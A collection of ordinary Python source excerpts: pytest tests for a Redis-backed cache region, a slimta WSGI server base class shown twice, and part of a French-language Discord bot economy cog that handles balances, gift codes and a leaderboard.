region['foo'] = 'bar' assert region['foo'] == 'bar' assert region._region_cache.conn.hget(region.name, 'foo') is not None del region['foo'] assert pytest.raises(KeyError, lambda: region['foo']) def test_children(region): sb = region.region('sub') assert sb in list(region.children()) def test_iter(region, region_cache): region['foo'] = 'bar' assert [x for x in region] region.invalidate() def test_invalidate_on(region): import blinker s = blinker.signal('named_signal') t = blinker.signal('other_signal') region['key'] = 'value' region.invalidate_on(s, t) s.send('nothing',in_='particular') assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None region['key'] = 'value' t.send('nothing', in_='particular') assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None def test_cached(region): called = [0] @region.cached def foobar(k, x=None): called[0] += 1 return k foobar(1) assert called[0] == 1 foobar(1) assert called[0] == 1 def test_get_or_compute(region): x = region.get_or_compute('computed_key', 0) assert 'computed_key' in region assert region['computed_key'] == 0 assert x == 0 y = region.get_or_compute('computed_key2', lambda: 200) assert y == 200 assert 'computed_key2' in region assert region['computed_key2'] == 200 def test_invalidate_connections(region_cache): region_cache.invalidate_connections() assert region_cache._w_conn is None assert region_cache._r_conn is None def test_reconnect_backoff(region, region_cache): region['key1'] = 0 region['key2'] = 1 region_cache._reconnect_backoff = 5 # 5 second backoff before trying to reconnect region_cache.invalidate_connections() assert region_cache.is_disconnected() with pytest.raises(KeyError): region['key1'] assert region_cache._w_conn is None assert region_cache._r_conn is None def test_timeout_with_context(region_with_timeout): with region_with_timeout as r: r['key1'] = 0 r['key2'] = 1 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout import time time.sleep(1) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout time.sleep(1.5) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) == -2 assert 'key1' not in region_with_timeout assert 'key2' not in region_with_timeout def test_timeout(region_with_timeout): region_with_timeout['key1'] = 0 region_with_timeout['key2'] = 1 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout import time time.sleep(1) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout time.sleep(1.5) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) == -2 assert 'key1' not in region_with_timeout assert 'key2' not in region_with_timeout # make sure we can recreate the region. region_with_timeout['key1'] = 0 region_with_timeout['key2'] = 1 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout subregion = region_with_timeout.region("subregion") subregion['key1'] = 0 subregion['key2'] = 1 assert subregion._region_cache.conn.hget(subregion.name, 'key1') is not None assert subregion._region_cache.conn.hget(subregion.name, 'key2') is not None assert subregion._region_cache.conn.ttl(subregion.name) > 0 assert 'key1' in subregion assert 'key2' in subregion import time time.sleep(1) assert subregion._region_cache.conn.ttl(subregion.name) > 0 assert subregion._region_cache.conn.hget(subregion.name, 'key1') is not None assert subregion._region_cache.conn.hget(subregion.name, 'key2') is not None assert 'key1' in subregion assert 'key2' in subregion time.sleep(1.5) assert subregion._region_cache.conn.ttl(subregion.name) == -2 assert 'key1' not in subregion assert 'key2' not in subregion # make sure we can recreate the region. subregion['key1'] = 0 subregion['key2'] = 1 assert subregion._region_cache.conn.hget(subregion.name, 'key1') is not None assert subregion._region_cache.conn.hget(subregion.name, 'key2') is not None assert subregion._region_cache.conn.ttl(subregion.name) > 0 assert 'key1' in subregion assert 'key2' in subregion
0.64646
0.284792
from __future__ import absolute_import import sys from gevent.pywsgi import WSGIServer as GeventWSGIServer from slimta import logging __all__ = ['WsgiServer'] log = logging.getHttpLogger(__name__) class WsgiServer(object): """Implements the base class for a WSGI server that logs its requests and responses and can easily be deployed as a functioning HTTP server. Instances of this class can be used as applications in WSGI server engines, or :meth:`.build_server` can be used. """ def build_server(self, listener, pool=None, ssl_args=None): """Constructs and returns a WSGI server engine, configured to use the current object as its application. :param listener: Usually a ``(ip, port)`` tuple defining the interface and port upon which to listen for connections. :param pool: If given, defines a specific :class:`gevent.pool.Pool` to use for new greenlets. :param ssl_args: Optional dictionary of TLS settings, causing sockets to be encrypted on connection. See :class:`~gevent.pywsgi.WSGIServer` for details. :rtype: :class:`gevent.pywsgi.WSGIServer` """ spawn = pool or 'default' ssl_args = ssl_args or {} return GeventWSGIServer(listener, self, log=sys.stdout, spawn=spawn, **ssl_args) def handle(self, environ, start_response): """Overridden by sub-classes to handle WSGI requests and generate a response. This method should be used as if it were the WSGI application function. :param environ: The WSGI environment variables_. :param start_response: Call this function to initiate the WSGI response. :returns: An iterable of raw data parts to return with the response. """ raise NotImplementedError() def __call__(self, environ, start_response): """When this object is used as a WSGI application, this method logs the request and ensures that the response will be logged as well. The request is then proxied to :meth:`.handle` for processing. """ log.wsgi_request(environ) def logged_start_response(status, headers, *args, **kwargs): log.wsgi_response(environ, status, headers) return start_response(status, headers, *args, **kwargs) return self.handle(environ, logged_start_response) # vim:et:fdm=marker:sts=4:sw=4:ts=4
slimta/http/wsgi.py
from __future__ import absolute_import import sys from gevent.pywsgi import WSGIServer as GeventWSGIServer from slimta import logging __all__ = ['WsgiServer'] log = logging.getHttpLogger(__name__) class WsgiServer(object): """Implements the base class for a WSGI server that logs its requests and responses and can easily be deployed as a functioning HTTP server. Instances of this class can be used as applications in WSGI server engines, or :meth:`.build_server` can be used. """ def build_server(self, listener, pool=None, ssl_args=None): """Constructs and returns a WSGI server engine, configured to use the current object as its application. :param listener: Usually a ``(ip, port)`` tuple defining the interface and port upon which to listen for connections. :param pool: If given, defines a specific :class:`gevent.pool.Pool` to use for new greenlets. :param ssl_args: Optional dictionary of TLS settings, causing sockets to be encrypted on connection. See :class:`~gevent.pywsgi.WSGIServer` for details. :rtype: :class:`gevent.pywsgi.WSGIServer` """ spawn = pool or 'default' ssl_args = ssl_args or {} return GeventWSGIServer(listener, self, log=sys.stdout, spawn=spawn, **ssl_args) def handle(self, environ, start_response): """Overridden by sub-classes to handle WSGI requests and generate a response. This method should be used as if it were the WSGI application function. :param environ: The WSGI environment variables_. :param start_response: Call this function to initiate the WSGI response. :returns: An iterable of raw data parts to return with the response. """ raise NotImplementedError() def __call__(self, environ, start_response): """When this object is used as a WSGI application, this method logs the request and ensures that the response will be logged as well. The request is then proxied to :meth:`.handle` for processing. """ log.wsgi_request(environ) def logged_start_response(status, headers, *args, **kwargs): log.wsgi_response(environ, status, headers) return start_response(status, headers, *args, **kwargs) return self.handle(environ, logged_start_response) # vim:et:fdm=marker:sts=4:sw=4:ts=4
0.688259
0.247544
import asyncio import logging import random import re import string import time from copy import copy from datetime import datetime, timedelta import discord from discord.errors import HTTPException from typing import Union, List, Tuple, Literal from redbot.core import Config, commands, checks from redbot.core.utils import AsyncIter from redbot.core.utils.menus import start_adding_reactions from redbot.core.utils.chat_formatting import box, humanize_number, humanize_timedelta from tabulate import tabulate logger = logging.getLogger("red.AwsmCogs.cash") class CashError(Exception): """Classe de base pour les erreurs Cash""" class BalanceTooHigh(CashError): """Soulevée lorsque le balance dépasse le seuil fixé""" class UnauthorizedMember(CashError): """Soulevée lorsqu'un membre n'est pas autorisé à réaliser une action""" class UserNotFound(CashError): """Soulevée lorsqu'un membre n'est pas retrouvé sur le serveur""" class UnknownGiftCode(CashError): """Soulevée lorsque le code cadeau donné n'existe pas""" class GiftCodeExpired(CashError): """Soulevée lorsqu'un code cadeau vient d'expirer""" def _invalid_amount(value: int) -> bool: return value < 0 class Account: def __init__(self, user: discord.Member, balance: int, logs: list, config: dict): self.user = user self.guild = user.guild self.balance = balance self.logs = logs self.config = config def __str__(self): return self.user.mention def __int__(self): return self.balance class Log: def __init__(self, user: discord.Member, text: str, timestamp: int, delta: int): self.user = user self.guild = user.guild self.text = text self.timestamp = timestamp self.delta = delta def __str__(self): return self.text def __int__(self): return self.timestamp class GiftCode: def __init__(self, code: str, author: discord.Member, expire: int, value: int): self.code = code self.author, self.guild = author, author.guild self.expire = expire self.value = value def __str__(self): return self.code def __int__(self): return self.value class Cash(commands.Cog): """Economie virtuelle et jeux utilisant celle-ci""" def __init__(self, bot): super().__init__() self.bot = bot self.config = Config.get_conf(self, identifier=736144321857978388, force_registration=True) default_member = {"balance": 0, "logs": [], "config": {"day_delta": [None, 0], "cache_daily_bonus": '', "cache_presence_bonus": 0} } default_guild = {"currency": "Ꞥ", "daily_bonus": 100, "presence_bonus": 0, "presence_delay": 600, "gift_codes": {}} default_global = {"max_balance": 10**9, "max_logs_length": 3} self.config.register_member(**default_member) self.config.register_guild(**default_guild) self.config.register_global(**default_global) async def get_currency(self, guild: discord.Guild) -> str: """Obtenir le symbole de la monnaie du serveur""" return await self.config.guild(guild).currency() async def set_currency(self, guild: discord.Guild, symbol: str) -> str: """Modifie le symbole de la monnaie du serveur Renvoie le nouveau symbole attribué""" if not isinstance(symbol, str): raise TypeError("Type du symbole invalide, {} != str".format(type(symbol))) if len(symbol) > 5: raise ValueError("Le symbole de la monnaie ne peut pas faire plus de 5 caractères de long") await self.config.guild(guild).currency.set(symbol) return symbol async def get_account(self, member: discord.Member) -> Account: """Obtenir l'objet Account du membre demandé""" userdata = await self.config.member(member).all() return Account(member, **userdata) async def get_balance(self, member: discord.Member) -> int: """Renvoie la valeur actuelle du solde d'un membre""" account = await self.get_account(member) return account.balance async def enough_balance(self, member: discord.Member, cost: int) -> bool: """Vérifie si le membre possède assez de fonds pour une dépense""" if not isinstance(cost, int): raise TypeError("Type de la dépense invalide, {} != int".format(type(cost))) if _invalid_amount(cost): return False return await self.get_balance(member) >= cost async def set_balance(self, member: discord.Member, value: int) -> int: """Modifier le solde d'un membre Renvoie le nouveau solde du compte""" if not isinstance(value, int): raise TypeError("Type du dépôt invalide, {} != int".format(type(value))) if value < 0: raise ValueError("Le solde ne peut être négatif") max_balance = await self.config.max_balance() if value > max_balance: raise BalanceTooHigh(f"Il est impossible de dépasser le seuil fixé de {max_balance} crédits") oldvalue = await self.config.member(member).balance() await self.edit_delta(member, value - oldvalue) await self.config.member(member).balance.set(value) return value async def deposit_credits(self, member: discord.Member, value: int) -> int: """Ajouter des crédits au solde d'un membre Renvoie le nouveau solde du compte""" if not isinstance(value, int): raise TypeError("Type du dépôt invalide, {} != int".format(type(value))) if _invalid_amount(value): raise ValueError(f"Valeur de dépôt invalide, {value} < 0") current = await self.get_balance(member) return await self.set_balance(member, current + value) async def remove_credits(self, member: discord.Member, value: int) -> int: """Retirer des crédits au solde d'un membre Renvoie le nouveau solde du compte""" if not isinstance(value, int): raise TypeError("Type de retrait invalide, {} != int".format(type(value))) if _invalid_amount(value): raise ValueError(f"Valeur de retrait invalide, {value} < 0") current = await self.get_balance(member) if value > current: raise ValueError(f"Fonds insuffisants, {value} > {current}") return await self.set_balance(member, current - value) async def transfert_credits(self, from_: discord.Member, to_: discord.Member, value: int) -> Tuple[Account, Account]: """Transfère des crédits d'un membre à un autre Renvoie un tuple contenant les comptes des deux membres""" if not isinstance(value, int): raise TypeError("Type du transfert invalide, {} != int".format(type(value))) if _invalid_amount(value): raise ValueError(f"Valeur du transfert invalide, {value} < 0") max_balance = await self.config.max_balance() if await self.get_balance(to_) + value > max_balance: raise BalanceTooHigh(f"Il est impossible de dépasser le seuil fixé de {max_balance} crédits lors d'une " f"transaction") await self.remove_credits(from_, value) await self.deposit_credits(to_, value) return await self.get_account(from_), await self.get_account(to_) async def gen_gcode(self, guild: discord.Guild) -> str: """Génère un code unique au format $XX-YYY pour les codes cadeaux Cap. max. théorique = 52 521 875 codes uniques""" current_codes = await self.config.guild(guild).gift_codes() r = lambda long: ''.join(random.choices(string.ascii_uppercase + string.digits, k=long)) code = f"${r(2)}-{r(3)}" while code in current_codes: code = f"${r(2)}-{r(3)}" return code async def new_gift_code(self, from_: discord.Member, value: int, timestamp: int) -> str: """Génère un nouveau code cadeau contenant une certaine somme Le code est valide seulement sur le serveur du membre ayant généré le code Renvoie le code généré""" if not isinstance(value, int): raise TypeError("Type de valeur invalide, {} != int".format(type(value))) if not isinstance(timestamp, int): raise TypeError("Type du timestamp d'expiration invalide, {} != int".format(type(timestamp))) if value < 0: raise ValueError("La valeur de crédits contenus dans le code doit être positif") if timestamp < 0: raise ValueError("La valeur de l'expiration doit être positive ou nulle") guild = from_.guild code = await self.gen_gcode(guild) current = await self.config.guild(guild).gift_codes() current[code] = {"value": value, "expire": timestamp, "author": from_.id} await self.config.guild(guild).gift_codes.set(current) return code async def fetch_gift_code(self, code: str, ref_user: discord.Member = None) -> Union[GiftCode, None]: """Retrouve automatiquement le serveur d'un code et renvoie celui-ci si trouvé, sinon None""" if not isinstance(code, str): raise TypeError("Type du code invalide, {} != str".format(type(code))) all_guilds = await self.config.all_guilds() for guildid in all_guilds: if code in all_guilds[guildid]["gift_codes"]: guild = self.bot.get_guild(guildid) if guild: if ref_user is not None and ref_user in guild.members: return await self.get_gift_code(guild, code) else: return await self.get_gift_code(guild, code) return None async def get_gift_code(self, guild: discord.Guild, code: str) -> Union[GiftCode, None]: """Renvoie un objet *GiftCode* s'il est trouvé, sinon None""" if not isinstance(code, str): raise TypeError("Le code est invalide, {} != str".format(type(code))) codes = await self.config.guild(guild).gift_codes() if code in codes: c = codes[code] if time.time() > c["expire"]: del codes[code] await self.config.guild(guild).gift_codes.set(codes) raise GiftCodeExpired(f"Le code cadeau {code} vient d'expirer") user = guild.get_member(c["author"]) if not user: raise UserNotFound(f"Le membre avec l'ID {c['author']} est introuvable") return GiftCode(author=user, value=c["value"], code=code, expire=c["expire"]) return None async def use_gift_code(self, user: discord.Member, code: str) -> Union[int, bool]: """Utilise un code et renvoie la valeur qu'il contenait si le membre générateur possède suffisamment de fonds, sinon renvoie False""" gift = await self.get_gift_code(user.guild, code) if not gift: raise UnknownGiftCode(f"Le code cadeau {code} n'existe pas pour GUILD_ID={user.guild.id}") if not await self.enough_balance(user, gift.value): return False await self.transfert_credits(gift.author, user, gift.value) return await self.remove_gift_code(user.guild, code) async def remove_gift_code(self, guild: discord.Guild, code: str) -> int: """Supprime le code et renvoie la valeur contenue dans celui-ci""" try: gift = await self.get_gift_code(guild, code) if not gift: raise UnknownGiftCode(f"Le code cadeau {code} n'existe pas pour GUILD_ID={guild.id}") await self.config.guild(guild).gift_codes.clear_raw(code) return gift.value except: raise ValueError(f"Le code cadeau {code} n'est pas valide") async def get_delta(self, member: discord.Member, yield_date: bool = False) -> Union[int, list]: """Renvoie la valeur et date du delta total des opérations du membre""" acc = await self.get_account(member) delta = acc.config["day_delta"] return delta[1] if not yield_date else delta async def edit_delta(self, member: discord.Member, value: int) -> int: """Modifie la valeur du delta des opérations du jour Renvoie la nouvelle valeur du delta""" if not isinstance(value, int): raise TypeError("Type de la valeur du delta invalide, {} != int".format(type(value))) date, delta = await self.get_delta(member, True) today = datetime.now().strftime("%Y.%m.%d") if date != today: delta = 0 await self.config.member(member).config.set_raw("day_delta", value=[today, delta + value]) return delta + value async def get_log(self, member: discord.Member, timestamp: int) -> Union[Log, None]: """Renvoie le (1er) log du membre correspondant au timestamp fourni si trouvé, sinon None""" if not isinstance(timestamp, int): raise TypeError("Type du timestamp invalide, {} != int".format(type(timestamp))) acc = await self.get_account(member) for log in acc.logs: if log["timestamp"] == timestamp: return Log(**log) return None async def get_member_logs(self, member: discord.Member) -> Union[List[Log], list]: """Renvoie tous les logs (sous forme d'objets Log) d'un membre Renvoie une liste vide si aucun log n'est présent""" acc = await self.get_account(member) all_logs = [] if acc.logs: for log in acc.logs: all_logs.append(Log(member, **log)) return all_logs async def add_log(self, member: discord.Member, text: str, delta: int) -> list: """Ajoute un log au membre visé Renvoie le nouvel état des logs""" if not isinstance(text, str): raise TypeError("Type du contenu du log invalide, {} != str".format(type(text))) if not isinstance(delta, int): raise TypeError("Type de somme du log invalide, {} != int".format(type(delta))) added = {"text": text, "timestamp": int(time.time()), "delta": delta} acc = await self.get_account(member) logs = acc.logs max_logs_length = await self.config.max_logs_length() if len(logs) >= max_logs_length: logs = logs[-(max_logs_length - 1):] logs.append(added) await self.config.member(member).logs.set(logs) return logs async def delete_log(self, member: discord.Member, timestamp: int) -> list: """Retire un log (ou plusieurs s'ils ont un timestamp identique) au membre visé Typiquement optionnel, les logs étant remplacés au fur et à mesure des ajouts Renvoie le nouvel état des logs""" if not isinstance(timestamp, int): raise TypeError("Type du timestamp du log invalide, {} != int".format(type(timestamp))) if not await self.get_log(member, timestamp): raise ValueError(f"Log avec le timestamp {timestamp} pour USERID={member.id} introuvable") acc = await self.get_account(member) logs = acc.logs new = copy(logs) for log in logs: if log["timestamp"] == timestamp: new.remove(log) await self.config.member(member).logs.set(new) return new async def wipe_logs(self, member: discord.Member) -> None: """Supprime tous les logs d'un membre""" await self.config.member(member).clear_raw("logs") async def wipe_guild(self, guild: discord.Guild) -> None: """Supprime les données bancaires des membres d'un serveur""" await self.config.clear_all_members(guild) async def wipe_account(self, member: discord.Member) -> None: """Supprime les données bancaires d'un membre""" await self.config.member(member).clear() async def raw_delete_account(self, user_id: int, guild: discord.Guild) -> None: """Supprime un compte bancaire par ID du membre""" await self.config.member_from_ids(guild.id, user_id).clear() async def get_max_balance(self) -> int: """Renvoie la valeur maximale que peut atteindre un solde de membre (sur n'importe quel serveur)""" return self.config.max_balance() async def set_max_balance(self, value: int) -> None: """Modifie la valeur maximale qu'un solde de membre peut atteindre""" if not isinstance(value, int): raise TypeError("Type de la valeur maximale invalide, {} != int".format(type(value))) if value <= 0: raise ValueError("Valeur invalide, le maximum ne peut pas être négatif ou nul") await self.config.max_balance.set(value) async def get_max_logs_length(self) -> int: """Renvoie le nombre maximal de logs pouvant être stockés dans les données bancaires d'un membre""" return self.config.max_logs_length() async def set_max_logs_length(self, length: int) -> None: """Modifie le nombre de logs stockés pour un membre""" if not isinstance(length, int): raise TypeError("Type de la longueur maximale invalide, {} != int".format(type(length))) if length < 1: raise ValueError("Valeur invalide, le maximum ne peut pas être négatif ou nul") await self.config.max_logs_length.set(length) async def get_guild_leaderboard(self, guild: discord.Guild, cutoff: int = None) -> Union[list, List[Account]]: """Renvoie le top des membres les plus riches du serveur (liste d'objets Account) Renvoie une liste vide si aucun top n'est générable""" users = await self.config.all_members(guild) sorted_users = sorted(list(users.items()), key=lambda u: u[1]["balance"], reverse=True) top = [] for uid, acc in sorted_users: user = guild.get_member(uid) if user: top.append(Account(user, **acc)) return top[:cutoff] if cutoff else top async def get_leaderboard_position_for(self, member: discord.Member) -> int: """Renvoie la position du membre dans le classement de son serveur Renvoie la dernière place du classement si le membre n'est pas trouvé""" top = await self.get_guild_leaderboard(member.guild) for acc in top: if acc.user == member: return top.index(acc) + 1 return len(top) async def utils_parse_timedelta(self, time_string: str) -> timedelta: """Renvoie un objet *timedelta* à partir d'un str contenant des informations de durée (Xj Xh Xm Xs)""" if not isinstance(time_string, str): raise TypeError("Le texte à parser est invalide, {} != str".format(type(time_string))) regex = re.compile('^((?P<days>[\\.\\d]+?)j)? *((?P<hours>[\\.\\d]+?)h)? *((?P<minutes>[\\.\\d]+?)m)? *((?P<seconds>[\\.\\d]+?)s)? *$') sch = regex.match(time_string) if not sch: raise ValueError("Aucun timedelta n'a pu être déterminé des valeurs fournies") parsed = sch.groupdict() return timedelta(**{i: int(parsed[i]) for i in parsed if parsed[i]}) # Commandes -----------------------v @commands.group(name="bank", aliases=["b"], invoke_without_command=True) async def _bank_actions(self, ctx, user: discord.Member = None): """Commandes de gestion du compte bancaire virtuel *Cash*""" if ctx.invoked_subcommand is None: return await ctx.invoke(self.show_bank, user=user) @_bank_actions.command(name="show") @commands.guild_only() async def show_bank(self, ctx, user: discord.Member = None): """Afficher les infos de son compte""" user = user if user else ctx.message.author acc = await self.get_account(user) curr = await self.get_currency(ctx.guild) hum_balance = humanize_number(acc.balance) em = discord.Embed(color=user.color, timestamp=ctx.message.created_at) em.set_author(name="Compte de " + str(user), icon_url=user.avatar_url) em.add_field(name="💰 Solde", value=box(f"{hum_balance} {curr}")) delta = await self.get_delta(user) delta_emoji = "📉" if delta < 0 else "📈" em.add_field(name=f"{delta_emoji} Variation", value=box(f"{delta:+}")) top = await self.get_leaderboard_position_for(user) em.add_field(name="🏅 Position", value=box(f"#{top}")) logs = await self.get_member_logs(user) if logs: txt = "\n".join([f"{log.delta:+} · {log.text[:50]}" for log in logs][::-1]) em.add_field(name="📃 Historique", value=txt) await ctx.send(embed=em) @_bank_actions.command(name="give") @commands.guild_only() @commands.cooldown(1, 60, commands.BucketType.member) async def bank_give(self, ctx, receveur: discord.Member, somme: int): """Transférer de l'argent à un receveur tiers""" try: await self.transfert_credits(ctx.author, receveur, int(somme)) curr = await self.get_currency(ctx.guild) await ctx.send(f"**Transfert réalisé** • {receveur.mention} a reçu **{somme}** {curr}") except ValueError: return await ctx.send("**Impossible** • Vous ne pouvez pas transférer une somme nulle ou négative") except BalanceTooHigh: plaf = humanize_number(await self.config.max_balance()) return await ctx.send(f"**Limite atteinte** • {receveur.mention} ne peut pas recevoir cette somme car " f"il dépasserait le plafond fixé de {plaf}") await self.add_log(ctx.author, f"Transfert d'argent à {receveur.name}", -somme) await self.add_log(receveur, f"Reception d'argent de {ctx.author.name}", somme) @_bank_actions.command(name="gift") @commands.guild_only() @commands.cooldown(1, 60, commands.BucketType.member) async def bank_gift(self, ctx, somme: int, expire: str = "24h"): """Générer un code cadeau contenant des crédits (retrait différé) Le retrait de crédits sur le compte du membre générateur n'est pas immédiat et l'utilisation du code sera impossible en cas de manque de fonds Par défaut les codes expirent au bout de 24h, vous pouvez modifier cela avec le paramètre *<expire>* en utilisant le format `\"Xj Xh Xm Xs\"`""" user = ctx.author if somme < 1: return await ctx.send( "**Erreur** • La valeur doit être positive (sup. à 0)") try: tdelta = await self.utils_parse_timedelta(expire) except ValueError: return await ctx.send("**Erreur** • Le temps d'expiration n'est pas valide, utilisez le format `\"Xj Xh Xm Xs\"`") if await self.enough_balance(user, somme): timestamp = (datetime.now() + tdelta).timestamp() curr = await self.get_currency(ctx.guild) em = discord.Embed(title=f"**Nouveau code-cadeau** · {somme} {curr}", description="**En cours de génération...**") em.add_field(name="Information", value="Un membre peut utiliser ce code avec `b open`\n" "Vous serez débité de la valeur du code lors de son utilisation\n" "L'expiration du code rend impossible son utilisation, pour " "détruire le code avant sa date d'expiration utilisez-le vous-même.") em.set_footer(text="Ce code expirera dans {}".format(humanize_timedelta(timedelta=tdelta))) try: dm = await user.send(embed=em) except: return await ctx.send("**Erreur** • Je ne peux pas générer de code si vous ne me permettez pas de vous envoyer un MP") try: code = await self.new_gift_code(user, somme, int(timestamp)) await asyncio.sleep(1) em.description = box(code) em.colour = user.color await dm.edit(embed=em) except ValueError as e: await ctx.send( f"**Erreur** • La génération du code n'a pas pu se faire en raison d'un problème dans les valeurs fournies : `{e}`") em.description = box("Erreur dans la génération du code") await dm.edit(embed=em) else: await ctx.send( "**Impossible** • Même si le retrait n'est pas immédiat, vous devez avoir la somme sur votre compte préalablement à la génération d'un code") @_bank_actions.command(name="open") async def bank_open_gift(self, ctx, code: str): """Utiliser un code-cadeau et obtenir son contenu Les codes ne fonctionnent que sur le serveur où ils ont été générés""" code = code.upper().strip() try: if ctx.guild: gift = await self.get_gift_code(ctx.guild, code) else: gift = await self.fetch_gift_code(code) except ValueError: return await ctx.send("**Invalide** • Le code fourni est invalide, vérifiez-le et réessayez") except GiftCodeExpired: return await ctx.send("**Expiré** • Le code fourni a expiré, consultez le générateur du code pour en obtenir un nouveau") if gift: guild = gift.guild curr = await self.get_currency(guild) hum_value = humanize_number(gift.value) content = f"{hum_value} {curr}" em = discord.Embed(title=f"**Code-cadeau** · {code}", description="Voulez-vous échanger le code contre son contenu ?") em.add_field(name="Contenu", value=box(content)) em.set_footer(text="🎁 Accepter | ❌ Refuser") emojis = ["🎁", "❌"] msg = await ctx.send(embed=em) start_adding_reactions(msg, emojis) try: react, user = await self.bot.wait_for("reaction_add", check=lambda r, u: u == ctx.author and r.message.id == msg.id, timeout=20) except asyncio.TimeoutError: await msg.delete() return else: emoji = react.emoji await msg.delete() if emoji == "🎁": if await self.enough_balance(gift.author, gift.value): try: await self.use_gift_code(ctx.author, code) except Exception as e: logger.error(e, exc_info=True) return await ctx.send("Erreur de transfert de fonds : `{}`".format(str(e).replace('\"', ''))) await self.add_log(ctx.author, "Utilisation d'un code-cadeau", gift.value) await self.add_log(gift.author, "Débit du code cadeau utilisé", -gift.value) await ctx.send(f"**Utilisation réussie** • **{humanize_number(gift.value)}** {curr} ont été " f"transférés sur votre compte.") else: await ctx.send(f"**Fonds insuffisants** • L'auteur du code ({str(gift.author)}) n'a plus les " f"fonds suffisants pour assumer la valeur de ce code") else: await ctx.send(f"**Code invalide** • Le code est invalide ou celui-ci a peut-être expiré") @commands.command(name="bonus") @commands.guild_only() async def cash_bonus(self, ctx): """Recevoir son bonus quotidien de crédits""" author = ctx.author today = datetime.now().strftime("%Y.%m.%d") acc = await self.get_account(author) curr = await self.get_currency(ctx.guild) bonus = await self.config.guild(ctx.guild).daily_bonus() if bonus: if acc.config["cache_daily_bonus"] != today: await self.config.member(author).config.set_raw("cache_daily_bonus", value=today) new = await self.deposit_credits(author, bonus) await self.add_log(author, "Bonus quotidien récupéré", bonus) em = discord.Embed(color=author.color, description=f"**+{bonus}** {curr} ont été ajoutés à votre compte au titre du bonus quotidien.", timestamp=ctx.message.created_at) em.set_author(name=str(author), icon_url=author.avatar_url) em.set_footer(text=f"Vous avez désormais {new} {curr}") await ctx.send(embed=em) else: await ctx.send("**Déjà récupéré** • Revenez demain pour obtenir votre bonus !") else: await ctx.send("**Désactivé** • Ce serveur n'offre pas de bonus quotidien") @commands.command(name="leaderboard", aliases=["lb"]) @commands.guild_only() @commands.cooldown(1, 10, commands.BucketType.guild) async def display_leaderboard(self, ctx, top: int = 20): """Affiche le top des membres les plus riches du serveur Vous pouvez modifier la longueur du top en précisant le paramètre *<top>*""" lbd = await self.get_guild_leaderboard(ctx.guild, top) if lbd: tbl = [] for acc in lbd: tbl.append([str(acc.user), acc.balance]) em = discord.Embed(color=await self.bot.get_embed_color(ctx.channel), description="```" + tabulate(tbl, headers=["Membre", "Solde"]) + "```",) em.set_author(name=f"🏆 Leaderboard de {ctx.guild.name}", icon_url=ctx.guild.icon_url) try: await ctx.send(embed=em) except HTTPException: await ctx.send("**Erreur** • Le top est trop grand pour être affiché, utilisez une " "valeur de <top> plus réduite") else: await ctx.send("Il n'y a aucun top à afficher.") @commands.group(name="bankset", aliases=["bset"]) @checks.admin_or_permissions(manage_messages=True) async def _bank_set(self, ctx): """Commandes de modération de la banque""" @_bank_set.command(name="monnaie", aliases=["currency"]) async def _bank_currency(self, ctx, symbole: str): """Changer le symbole utilisé pour la monnaie sur le serveur""" try: await self.set_currency(ctx.guild, symbole) await ctx.send(f"**Changement réalisé** • Le nouveau symbole de la monnaie sera `{symbole}`") except ValueError: await ctx.send("**Erreur** • Vous ne pouvez pas utiliser une monnaie de plus de 5 caractères de long") @_bank_set.command(name="dailybonus") async def _bank_daily_bonus(self, ctx, somme: int): """Modifier le bonus quotidien octroyé aux membres Mettre 0 désactive le bonus quotidien""" guild = ctx.guild if somme >= 0: await self.config.guild(guild).daily_bonus.set(somme) curr = await self.get_currency(guild) if somme > 0: await ctx.send(f"**Somme modifiée** • Les membres auront le droit à {somme} {curr} par jour") else: await ctx.send("**Bonus désactivé** • Les membres ne pourront plus demander un bonus quotidien de crédits") else: await ctx.send("**Impossible** • La valeur du bonus doit être positif, ou nulle si vous voulez désactiver la fonctionnalité") @_bank_set.command(name="presbonus") async def _bank_presence_bonus(self, ctx, somme: int): """Modifier le bonus de présence octroyé aux membres parlant sur les salons (par unité de temps) Mettre 0 désactive ce bonus""" guild = ctx.guild if somme >= 0: await self.config.guild(guild).presence_bonus.set(somme) curr = await self.get_currency(guild) delay = await self.config.guild(guild).presence_delay() if somme > 0: await ctx.send(f"**Somme modifiée** • Les membres recevront {somme} {curr} toutes les {delay} secondes") else: await ctx.send( "**Bonus désactivé** • Les membres ne recevront plus de crédits lorsqu'ils discutent") else: await ctx.send( "**Impossible** • La valeur du bonus doit être positif, ou nulle si vous voulez désactiver la fonctionnalité") @_bank_set.command(name="presdelay") async def _bank_presence_delay(self, ctx, secondes: int = 600): """Modifier le délai en secondes entre deux bonus de présence (par def. 600s = 10m)""" guild = ctx.guild if secondes >= 60: await self.config.guild(guild).presence_delay.set(secondes) curr = await self.get_currency(guild) bonus = await self.config.guild(guild).presence_bonus() await ctx.send( f"**Délai modifié** • Les membres recevront {bonus} {curr} toutes les {secondes} secondes") else: await ctx.send( "**Invalide** • Le délai doit être supérieur à 60s") @_bank_set.command(name="edit") async def _bank_edit_account(self, ctx, user: discord.Member, value: int = None): """Modifie le solde d'un compte de membre Ne rien 